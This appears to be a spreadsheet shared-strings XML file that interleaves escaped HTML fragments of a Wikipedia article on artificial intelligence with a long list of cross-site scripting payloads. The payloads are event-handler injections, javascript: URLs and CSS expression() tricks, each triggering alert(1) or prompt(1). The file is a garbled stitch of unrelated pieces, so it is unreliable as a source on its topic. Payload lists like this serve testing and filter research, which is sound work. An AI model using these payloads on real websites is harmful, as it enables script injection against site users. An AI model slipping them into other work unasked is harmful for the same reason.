    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Economist&amp;amp;rft.atitle=Getting+to+grips+with+military+robotics&amp;amp;rft.date=2018-01-25&amp;amp;rft_id=https%3A%2F%2Fwww.economist.com%2Fnews%2Fspecial-report%2F21735478-autonomous-robots-and-swarms-will-change-nature-warfare-getting-grips&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Griewank, Andreas (2012). Who Invented the Reverse Mode of Differentiation?. Optimization Stories, Documenta Matematica, Extra Volume ISMP (2012), 389–400. </t>
  </si>
  <si>
    <t>&lt;svg onmousedown="alert(1)"&gt;test&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;progress onkeypress="alert(1)" contenteditable&gt;test&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;noembed onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/noembed&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:7.5em"&gt;&lt;a href="/wiki/Category:Metatheory_of_science" title="Category:Metatheory of science"&gt;Metatheory&lt;br /&gt;of science &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;padding:0px"&gt;</t>
  </si>
  <si>
    <t>javascript:document.location='http://www.google.com/</t>
  </si>
  <si>
    <t>&lt;label onpointerleave=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;map onload=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;marquee style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;meter id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/meter&gt;</t>
  </si>
  <si>
    <t>&lt;rtc id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/rtc&gt;</t>
  </si>
  <si>
    <t>&lt;listing id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/listing&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;td style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;element onmouseleave="alert(1)"&gt;test&lt;/element&gt;</t>
  </si>
  <si>
    <t>&lt;rt oncopy="alert(1)" contenteditable&gt;test&lt;/rt&gt;</t>
  </si>
  <si>
    <t>&lt;video onmouseleave="alert(1)"&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;q onbeforecopy="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;button onbeforecopy="alert(1)" contenteditable&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;AI can also produce &lt;a href="/wiki/Deepfake" title="Deepfake"&gt;Deepfakes &lt;/a&gt;, a content-altering technology. ZDNet reports, "It presents something that did not actually occur," Though 88% of Americans believe Deepfakes can cause more harm than good, only 47% of them believe they can be targeted. The boom of election year also opens public discourse to threats of videos of falsified politician media.&lt;sup id="cite_ref-299" class="reference"&gt;&lt;a href="#cite_note-299"&gt;&amp;#91;288&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;spacer id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/spacer&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;tr style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/tr&gt;</t>
  </si>
  <si>
    <t>&lt;pre draggable="true" ondragenter="alert(1)"&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;strong onbeforepaste="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;th onkeypress="alert(1)" contenteditable&gt;test&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;discard onpointerleave=alert(1)&gt;XSS&lt;/discard&gt;</t>
  </si>
  <si>
    <t>&lt;mark onclick="alert(1)"&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onpointerout=alert(1)&gt;XSS&lt;/xmp&gt;</t>
  </si>
  <si>
    <t>&lt;meta onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/meta&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;dir oncontextmenu="alert(1)"&gt;test&lt;/dir&gt;</t>
  </si>
  <si>
    <t>&lt;dfn id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/dfn&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;Gibbs, Samuel (27 October 2014). &lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/technology/2014/oct/27/elon-musk-artificial-intelligence-ai-biggest-existential-threat"&gt;"Elon Musk: artificial intelligence is our biggest existential threat" &lt;/a&gt;. &lt;i&gt;The Guardian &lt;/i&gt;. &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20151030054330/http://www.theguardian.com/technology/2014/oct/27/elon-musk-artificial-intelligence-ai-biggest-existential-threat"&gt;Archived &lt;/a&gt; from the original on 30 October 2015&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;30 October </t>
  </si>
  <si>
    <t>&lt;track onpointerover=alert(1)&gt;XSS&lt;/track&gt;</t>
  </si>
  <si>
    <t>&lt;ol onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/ol&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;sub onmousemove="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;s oncopy="alert(1)" contenteditable&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpointerover=alert(1)&gt;XSS&lt;/mark&gt;</t>
  </si>
  <si>
    <t>javascript:alert('');</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;i&gt;&lt;a href="/wiki/Tractatus_Logico-Philosophicus" title="Tractatus Logico-Philosophicus"&gt;Tractatus Logico-Philosophicus &lt;/a&gt; &lt;/i&gt;&lt;span class="nowrap"&gt;&amp;#160; </t>
  </si>
  <si>
    <t>&lt;hgroup draggable="true" ondrag="alert(1)"&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t>&lt;u onmouseenter="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;marquee id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;input onmouseup="alert(1)"&gt;test&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">      &lt;span class="fa fa-caret-down"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation magazine"&gt;Thompson, Derek (2018). &lt;a rel="nofollow" class="external text" href="https://www.theatlantic.com/business/archive/2014/01/what-jobs-will-the-robots-take/283239/"&gt;"What Jobs Will the Robots Take?" &lt;/a&gt;. &lt;i&gt;The Atlantic &lt;/i&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;24 April </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFRussellNorvig2009" class="citation book"&gt;&lt;a href="/wiki/Stuart_J._Russell" title="Stuart J. Russell"&gt;Russell, Stuart J. &lt;/a&gt;; &lt;a href="/wiki/Peter_Norvig" title="Peter Norvig"&gt;Norvig, Peter &lt;/a&gt; (2009). &lt;i&gt;&lt;a href="/wiki/Artificial_Intelligence:_A_Modern_Approach" title="Artificial Intelligence: A Modern Approach"&gt;Artificial Intelligence: A Modern Approach &lt;/a&gt; &lt;/i&gt; (3rd ed.). Upper Saddle River, New Jersey: Prentice Hall. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-13-604259-4" title="Special:BookSources/978-0-13-604259-4"&gt;&lt;bdi&gt;978-0-13-604259-4 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+A+Modern+Approach&amp;amp;rft.place=Upper+Saddle+River%2C+New+Jersey&amp;amp;rft.edition=3rd&amp;amp;rft.pub=Prentice+Hall&amp;amp;rft.date=2009&amp;amp;rft.isbn=978-0-13-604259-4&amp;amp;rft.aulast=Russell&amp;amp;rft.aufirst=Stuart+J.&amp;amp;rft.au=Norvig%2C+Peter&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;901–942, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;320–363, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay controls onseeked=alert(1)&gt;&lt;source src="validvideo.mp4" type="video/mp4"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Knowledge_engineering" title="Knowledge engineering"&gt;Knowledge engineering &lt;/a&gt;:</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Optimization_search-190"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Optimization_search_190-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;form onkeydown="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-294"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-294"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;map onkeypress="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;listing onblur=alert(1) tabindex=1 id=x&gt;&lt;/listing&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;tt id=x tabindex=1 onactivate=alert(1)&gt;&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;cite onkeypress="alert(1)" contenteditable&gt;test&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Ethics_of_artificial_intelligence" title="Ethics of artificial intelligence"&gt;Ethics of artificial intelligence &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;link id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/link&gt;</t>
  </si>
  <si>
    <t>&lt;spacer onpointerout=alert(1)&gt;XSS&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;option style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Singularity-410"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Singularity_410-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Singularity_410-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Singularity_410-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;70–71 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup oncopy="alert(1)" contenteditable&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. Englewood Cliffs, N.J.: Prentice-Hall. &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/978-0-13-165449-5" title="Special:BookSources/978-0-13-165449-5"&gt;&lt;bdi&gt;978-0-13-165449-5 &lt;/bdi&gt; &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Computation%3A+Finite+and+Infinite+Machines&amp;amp;rft.place=Englewood+Cliffs%2C+N.J.&amp;amp;rft.pub=Prentice-Hall&amp;amp;rft.date=1967&amp;amp;rft.isbn=978-0-13-165449-5&amp;amp;rft.aulast=Minsky&amp;amp;rft.aufirst=Marvin&amp;amp;rft_id=https%3A%2F%2Farchive.org%2Fdetails%2Fcomputationfinit0000mins&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;footer onmouseup="alert(1)"&gt;test&lt;/footer&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;strike id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/strike&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation web"&gt;Busby, Mattha (30 April 2018). &lt;a rel="nofollow" class="external text" href="https://www.theguardian.com/technology/2018/apr/30/bookies-using-ai-to-keep-gamblers-hooked-insiders-say"&gt;"Revealed: how bookies use AI to keep gamblers hooked" &lt;/a&gt;. &lt;i&gt;the Guardian &lt;/i&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=the+Guardian&amp;amp;rft.atitle=Revealed%3A+how+bookies+use+AI+to+keep+gamblers+hooked&amp;amp;rft.date=2018-04-30&amp;amp;rft.aulast=Busby&amp;amp;rft.aufirst=Mattha&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Ftechnology%2F2018%2Fapr%2F30%2Fbookies-using-ai-to-keep-gamblers-hooked-insiders-say&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Gary_Marcus" title="Gary Marcus"&gt;Marcus, Gary &lt;/a&gt;, "Am I Human?: Researchers need new ways to distinguish artificial intelligence from the natural kind", &lt;i&gt;&lt;a href="/wiki/Scientific_American" title="Scientific American"&gt;Scientific American &lt;/a&gt; &lt;/i&gt;, vol. 316, no. 3 (March 2017), pp.&amp;#160;58–63.  A stumbling block to AI has been an incapacity for reliable &lt;a href="/wiki/Disambiguation" class="mw-redirect" title="Disambiguation"&gt;disambiguation &lt;/a&gt;.  An example is the "pronoun disambiguation problem":  a machine has no way of determining to whom or what a &lt;a href="/wiki/Pronoun" title="Pronoun"&gt;pronoun &lt;/a&gt; in a sentence refers. (p.&amp;#160;61.) &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;rp draggable="true" ondragleave="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;menu onmouseleave="alert(1)"&gt;test&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;noembed id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/noembed&gt;</t>
  </si>
  <si>
    <t>&lt;img onmouseenter="alert(1)"&gt;test&lt;/img&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 	&lt;a href="#cite_note-The_Economist-135"&gt;&amp;#91;132&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-38"&gt;&lt;a href="#Finance_and_economics"&gt;&lt;span class="tocnumber"&gt;7.3 </t>
  </si>
  <si>
    <t>&lt;frameset onbeforecut="alert(1)" contenteditable&gt;test&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;element onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/element&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes slidein {}&lt;/style&gt;&lt;mark style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"&gt;&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;em onmousedown="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;small draggable="true" ondragenter="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t>&lt;bdo draggable="true" ondragleave="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_civil_engineering" title="Glossary of civil engineering"&gt;Civil engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;time id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/time&gt;</t>
  </si>
  <si>
    <t>&lt;pre onpointerleave=alert(1)&gt;XSS&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=unknown&amp;amp;rft.jtitle=MIT+Sloan+Management+Review&amp;amp;rft.atitle=Reshaping+Business+With+Artificial+Intelligence&amp;amp;rft_id=https%3A%2F%2Fsloanreview.mit.edu%2Fprojects%2Freshaping-business-with-artificial-intelligence%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;details onpointermove=alert(1)&gt;XSS&lt;/details&gt;</t>
  </si>
  <si>
    <t>&lt;track id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/track&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;figure onkeyup="alert(1)" contenteditable&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t>&lt;command onpaste="alert(1)" contenteditable&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;p onblur=alert(1) tabindex=1 id=x&gt;&lt;/p&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;b onpointerup=alert(1)&gt;XSS&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Center_for_Security_and_Emerging_Technology" title="Center for Security and Emerging Technology"&gt;Center for Security and Emerging Technology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; [&lt;a rel="nofollow" class="external text" href="//arxiv.org/archive/cs.CL"&gt;cs.CL &lt;/a&gt;]. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=preprint&amp;amp;rft.jtitle=arXiv&amp;amp;rft.atitle=Multilingual+Language+Processing+From+Bytes&amp;amp;rft.date=2015&amp;amp;rft_id=info%3Aarxiv%2F1512.00103&amp;amp;rft.aulast=Gillick&amp;amp;rft.aufirst=Dan&amp;amp;rft.au=Brunk%2C+Cliff&amp;amp;rft.au=Vinyals%2C+Oriol&amp;amp;rft.au=Subramanya%2C+Amarnag&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;data ondblclick="alert(1)"&gt;test&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;article id=x tabindex=1 onfocus=alert(1)&gt;&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;hr style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/hr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Arntz, Melanie, Terry Gregory, and Ulrich Zierahn. "The risk of automation for jobs in OECD countries: A comparative analysis." OECD Social, Employment, and Migration Working Papers 189 (2016). p. 33. </t>
  </si>
  <si>
    <t>&lt;u onpointerup=alert(1)&gt;XSS&lt;/u&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Transhumanism-411"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Transhumanism_411-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;rb id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/rb&gt;</t>
  </si>
  <si>
    <t>&lt;img src="/" =_=" title="onerror='prompt(1)'"&gt;</t>
  </si>
  <si>
    <t>&lt;datalist onbeforecopy="alert(1)" contenteditable&gt;test&lt;/datalist&gt;</t>
  </si>
  <si>
    <t>&lt;small draggable="true" ondragstart="alert(1)"&gt;test&lt;/small&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;style&gt;//*{x:expression(alert(//))}//&lt;style&gt;&lt;/style&gt; </t>
  </si>
  <si>
    <t>&lt;main id=x tabindex=1 onfocus=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;i onpointermove=alert(1)&gt;XSS&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;link id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/link&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>Making the Mathematical Objection:</t>
  </si>
  <si>
    <t>&lt;title id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/title&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;canvas ondrop=alert(1) contenteditable&gt;drop here&lt;/canvas&gt;</t>
  </si>
  <si>
    <t>&lt;set onpointerout=alert(1)&gt;XSS&lt;/set&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;341–344, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div onblur=alert(1) tabindex=1 id=x&gt;&lt;/div&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;sub onmouseleave="alert(1)"&gt;test&lt;/sub&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;/a&gt;&lt;/dt&gt;&lt;dd&gt;Download files and/or images associated with your scraped items.&lt;/dd&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;del id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;noframes onmouseover="alert(1)"&gt;test&lt;/noframes&gt;</t>
  </si>
  <si>
    <t>&lt;ins onpointerdown=alert(1)&gt;XSS&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup draggable="true" ondragleave="alert(1)"&gt;test&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;strong onpointerover=alert(1)&gt;XSS&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;mark onpaste="alert(1)" contenteditable&gt;test&lt;/mark&gt;</t>
  </si>
  <si>
    <t>&lt;hr onpointermove=alert(1)&gt;XSS&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;option style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/option&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;bdo onload=alert(1)&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFDomingos2015"&gt;Domingos 2015 &lt;/a&gt;, Chapter 2, Chapter 4, Chapter 6. </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;bgsound style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;hr onkeypress="alert(1)" contenteditable&gt;test&lt;/hr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;video style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t>&lt;textarea onpointerup=alert(1)&gt;XSS&lt;/textarea&gt;</t>
  </si>
  <si>
    <t>&lt;style id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/style&gt;</t>
  </si>
  <si>
    <t>&lt;base onpointermove=alert(1)&gt;XSS&lt;/base&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Cell &lt;/i&gt;. &lt;b&gt;172 &lt;/b&gt; (5): 1122–1131.e9. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1016%2Fj.cell.2018.02.010"&gt;10.1016/j.cell.2018.02.010 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/29474911"&gt;29474911 &lt;/a&gt;&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;18 December </t>
  </si>
  <si>
    <t>&lt;dialog id=x tabindex=1 onfocus=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-8"&gt;&lt;a href="#Learning"&gt;&lt;span class="tocnumber"&gt;4.4 </t>
  </si>
  <si>
    <t>&lt;area oncut="alert(1)" contenteditable&gt;test&lt;/area&gt;</t>
  </si>
  <si>
    <t>&lt;nextid onpointerleave=alert(1)&gt;XSS&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main article: &lt;a href="/wiki/Robotics" title="Robotics"&gt;Robotics &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;input type="checkbox" class="vectorMenuCheckbox" aria-labelledby="p-variants-label" /&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Nick_Bostrom" title="Nick Bostrom"&gt;Nick Bostrom &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;h1 onbeforecopy="alert(1)" contenteditable&gt;test&lt;/h1&gt;</t>
  </si>
  <si>
    <t>&lt;address onblur=alert(1) tabindex=1 id=x&gt;&lt;/address&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;button autofocus onfocus=alert(1)&gt;test&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;form onpaste="alert(1)" contenteditable&gt;test&lt;/form&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Edge_detection" title="Edge detection"&gt;edge detection &lt;/a&gt;) helps AI compose informative abstract structures out of raw data. &lt;/div&gt; &lt;/div&gt; &lt;/div&gt;</t>
  </si>
  <si>
